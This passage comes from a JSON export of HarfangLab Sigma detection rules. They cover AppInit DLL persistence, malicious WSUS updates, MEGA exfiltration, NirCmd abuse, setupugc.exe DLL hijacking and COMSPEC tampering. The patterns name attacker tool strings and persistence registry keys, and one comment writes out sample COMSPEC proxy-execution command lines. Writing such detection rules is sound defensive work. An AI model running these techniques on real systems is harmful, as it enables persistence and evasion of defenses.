"https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/",
"https://attack.mitre.org/techniques/T1546/010/"
],
"name": "t1546_010_persistence_registry_appinit_dlls.yml",
"content": "title: Registry AppInit DLLs Modified\nid: 1dff2e4d-9edd-4b48-af83-6c559ea3e9c5\ndescription: |\n Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\n Attackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\n This functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\n It is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/\n - https://attack.mitre.org/techniques/T1546/010/\ndate: 2020/09/24\nmodified: 2025/05/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry:\n EventType: SetValue\n\n selection_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n filter_loadappinit:\n # For LoadAppInit_DLLs all values != zero are valid\n Details: 'DWORD (0x00000000)'\n\n selection_key_appinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n\n selection_key_requiresignedappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n Details: 'DWORD (0x00000000)'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - 
''\n - '\\n'\n\n exclusion_nvidia_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_nvidia_loadappInit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Program Files\\NVIDIA Corporation\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_sophos_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\WINDOWS\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll,?:\\Windows\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll,?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\Windows\\System32\\SophosAV\\sophos_detoured_x64.dll'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL,?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n\n exclusion_sophos_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-setup32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n exclusion_appsense:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmCoreService.exe'\n\n # Equitrac Office Client\n exclusion_equitrac:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'EQPortMonitorSpy.dll'\n\n exclusion_msi_install_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n 
Details: 'DWORD (0x00000001)'\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding * E Global\\MSI0000'\n - '?:\\Windows\\system32\\MsiExec.exe -Embedding * E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_nvidia_hp:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage|contains: '\\Display.NvContainer\\NVDisplay.Container.exe'\n Details:\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook32.dll'\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook.dll'\n\n exclusion_citrix:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook64.dll'\n\n exclusion_setupplatform:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_greenprint:\n # ce0cd8e9ad34b85bd164a60a4a5de5cee895353d8520cf14923399d1001aa3e1\n Details: '?:\\Progra~?\\Greenp~?\\gphknt32.dll'\n\n exclusion_altiris:\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n Details: 'DWORD (0x00000001)'\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n Details:\n - 'aminit64.dll'\n - 'aminit32.dll'\n\n exclusion_virtualdesktop:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\PROGRA~?\\VIRTUA~?\\VIRTUA~?.DLL'\n\n exclusion_systrack:\n ProcessImage: '?:\\Program Files (x86)\\SysTrack\\LsiAgent\\LsiAgent.exe'\n\n condition: 
selection_registry and ((selection_loadappinit and not filter_loadappinit) or 1 of selection_key_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5",
"rule_name": "Registry AppInit DLLs Modified",
"rule_description": "Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs registry values.\nAttackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\nThis functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\nNote that on Windows 8 and later with Secure Boot enabled, the AppInit DLL mechanism is disabled by the operating system, so the modification may indicate intent rather than successful persistence; the write itself remains suspicious.\nIt is recommended to analyze the process responsible for the registry modification and the library pointed to by the registry value to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-05-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1e085ad6-7f93-463c-9238-b75582736135",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072911Z",
"creation_date": "2026-03-23T11:45:34.072913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072918Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/SharpWSUS",
"https://github.com/ThunderGunExpress/Thunder_Woosus",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_potential_malicious_update_through_wsus.yml",
"content": "title: Possible Malicious Update via WSUS\nid: 1e085ad6-7f93-463c-9238-b75582736135\ndescription: |\n Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\n Attackers can use WSUS to launch malicious payloads disguised as Windows Updates.\n This technique can be used for lateral movement.\n Only successfully installed updates (event ID 19) whose title contains one of the default names used by these tools are matched; an attacker who customizes the update title will not trigger this rule.\n It is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://github.com/ThunderGunExpress/Thunder_Woosus\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/11/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 19 # Successful update\n Source: Microsoft-Windows-WindowsUpdateClient\n updateTitle|contains:\n - 'SharpWSUS'\n - 'Probably-legal-update'\n - 'Bundle update for \\* Windows (from KB2862335)'\n - 'Bundle Security Update for \\* Windows (from KB2862335)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1e085ad6-7f93-463c-9238-b75582736135",
"rule_name": "Possible Malicious Update via WSUS",
"rule_description": "Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\nAttackers can use WSUS to launch malicious payloads disguised as Windows Updates.\nThis technique can be used for lateral movement.\nOnly successfully installed updates (event ID 19) whose title contains one of the default names used by these tools are matched; an attacker who customizes the update title will not trigger this rule.\nIt is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091788Z",
"creation_date": "2026-03-23T11:45:34.091790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091794Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1567_002_suspicious_url_request_to_mega.yml",
"content": "title: Suspicious URL Request to the MEGA API\nid: 1eb11fe6-9630-4058-bdec-67f5cde7cb1a\ndescription: |\n Detects suspicious URL requests to the file sharing service MEGA.\n Adversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\n The BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\n Requests made by processes signed by Mega Limited (e.g. the official MEGA client) are excluded, so data exfiltrated through the legitimate client will not trigger this rule.\n It is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\n Additionally, review related alerts and, if a file was downloaded, try to analyze it.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/07/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1537\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'g.api.mega.co.nz'\n\n filter_mega:\n ProcessSigned: 'true'\n ProcessSignature: 'Mega Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a",
"rule_name": "Suspicious URL Request to the MEGA API",
"rule_description": "Detects suspicious URL requests to the file sharing service MEGA.\nAdversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\nThe BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\nRequests made by processes signed by Mega Limited (e.g. the official MEGA client) are excluded, so data exfiltrated through the legitimate client will not trigger this rule.\nIt is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\nAdditionally, review related alerts and, if a file was downloaded, try to analyze it.\n",
"rule_creation_date": "2023-07-17",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1102.002",
"attack.t1537",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ecc91f4-bed7-4cec-b236-f7b943f95289",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295810Z",
"creation_date": "2026-03-23T11:45:35.295814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295820Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://www.nirsoft.net/utils/nircmd.html",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_execution_of_nircmd.yml",
"content": "title: NirCmd Execution\nid: 1ecc91f4-bed7-4cec-b236-f7b943f95289\ndescription: |\n Detects the execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled in the rule ad9a4851-d601-4528-a0d2-a3d77b050741\n filter_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_commandline:\n CommandLine: '*\\nircmd.exe setsysvolume *'\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # https://www.dicomizer.com/\n exclusion_modalizer:\n - CommandLine:\n - 'nircmd win close ititle OBS'\n - 'nircmd win close ititle capture'\n # nircmd convertimages 
c:\\videocapture\\capture\\*.png .jpg\n - 'nircmd convertimages ?:\\videocapture\\capture\\\\*'\n # nircmd win setsize title capture 980 90 390 650\n - 'nircmd win setsize title capture *'\n - ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\videocapture\\\\*\\\\*.bat'\n\n exclusion_westerndigital:\n ParentImage: '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n\n exclusion_medinbox:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*\\Medinbox\\Medinbox.Launcher\\Medinbox.Launcher.bat'\n\n exclusion_openwhispr:\n Image|endswith: '\\resources\\bin\\nircmd.exe'\n ProcessParentProduct: 'OpenWhispr'\n ProcessParentCompany: 'OpenWhispr Team'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ecc91f4-bed7-4cec-b236-f7b943f95289",
"rule_name": "NirCmd Execution",
"rule_description": "Detects the execution of NirCmd.\nNirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602126Z",
"creation_date": "2026-03-23T11:45:34.602129Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602137Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setupugc.yml",
"content": "title: DLL Hijacking via setupugc.exe\nid: 1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via setupugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads are filtered out when the process or the loaded library resides in System32, SysWOW64 or WinSxS, or when the library is signed by Microsoft Windows, so the rule triggers only on setupugc.exe running from an unusual location and loading a library that is not Microsoft-signed.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setupugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DNSAPI.dll'\n - '\\mpr.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc",
"rule_name": "DLL Hijacking via setupugc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via setupugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads are filtered out when the process or the loaded library resides in System32, SysWOW64 or WinSxS, or when the library is signed by Microsoft Windows, so the rule triggers only on setupugc.exe running from an unusual location and loading a library that is not Microsoft-signed.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080239Z",
"creation_date": "2026-03-23T11:45:34.080241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080245Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_cmd_comspec_tampering.yml",
"content": "title: COMSPEC Tampered via cmd.exe\nid: 1f00e764-5dc8-4df8-a8d7-2e11b24a7e76\ndescription: |\n Detects a tampering of the COMSPEC environment variable on the cmd.exe command line.\n This can be used to perform a signed script proxy execution and take over control of a legitimate script.\n Only modifications made through a cmd.exe command line (/c ... set comspec=) are covered; the same tampering performed from PowerShell ($env:COMSPEC) is not detected by this rule.\n It is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\nreferences:\n - https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\T1216_random_executable.exe && cscript C:\\Windows\\System32\\manage-bde.wsf\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\cmd.exe\n # $env:comspec=C:\\Windows\\system32\\calc.exe; cscript C:\\Windows\\System32\\manage-bde.wsf\n selection_1:\n - Image|endswith: '\\cmd.exe'\n # Renamed binaries\n - OriginalFileName: 'Cmd.EXE'\n selection_2:\n CommandLine|contains|all:\n - '/c '\n - 'set'\n - ' comspec='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76",
"rule_name": "COMSPEC Tampered via cmd.exe",
"rule_description": "Detects a tampering of the COMSPEC environment variable on the cmd.exe command line.\nThis can be used to perform a signed script proxy execution and take over control of a legitimate script.\nOnly modifications made through a cmd.exe command line (/c ... set comspec=) are covered; the same tampering performed from PowerShell ($env:COMSPEC) is not detected by this rule.\nIt is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
